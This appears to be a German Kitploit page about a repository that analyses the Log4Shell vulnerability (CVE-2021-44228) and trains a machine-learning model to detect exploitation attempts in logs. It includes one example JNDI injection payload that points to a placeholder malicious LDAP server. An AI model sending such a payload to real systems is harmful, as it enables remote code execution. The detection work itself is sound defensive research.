Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!
Log4Shell-vulnerability-CVE-2021-44228- — Dieses Repository bietet eine eingehende Analyse der Log4Shell-Schwachstelle (CVE-2021-44228) und implementiert einen auf maschinellem Lernen basierenden Ansatz zur Erkennung von Ausnutzungsversuchen in Protokolldaten. | Kitploit
Dieses Repository bietet eine eingehende Analyse der Log4Shell-Schwachstelle (CVE-2021-44228) und implementiert einen auf maschinellem Lernen basierenden Ansatz zur Erkennung von Ausnutzungsversuchen in Protokolldaten.
Dieses Repository bietet eine detaillierte Analyse und Implementierung eines maschinellen Lernsystems zur Erkennung der Log4Shell-Bedrohung (CVE-2021-44228). Es umfasst:
Log4Shell verstehen: Was es ist und warum es gefährlich ist
Datensatzerfassung: Quellen und Vorverarbeitungsschritte
Feature Engineering: Extraktion von JNDI-basierten schädlichen Mustern
Training des maschinellen Lernmodells: Erkennung mit Random Forest
Ergebnisse und Analyse: Leistungsmetriken und Evaluierungsgrafiken
Fazit und zukünftige Arbeiten
Bedrohungsüberblick - Log4Shell (CVE-2021-44228)
Schwachstelle: Remote Code Execution (RCE) in Apache Log4j 2
Ausnutzungsbeispiel:
root@kitploit:~
${jndi:ldap://malicious-server.com/exploit}
Auswirkung: Angreifer können die vollständige Kontrolle über betroffene Systeme übernehmen
Gegenmaßnahmen: Aktualisieren Sie Log4j auf gepatchte Versionen (2.17.0 oder höher) und wenden Sie Firewall-Regeln an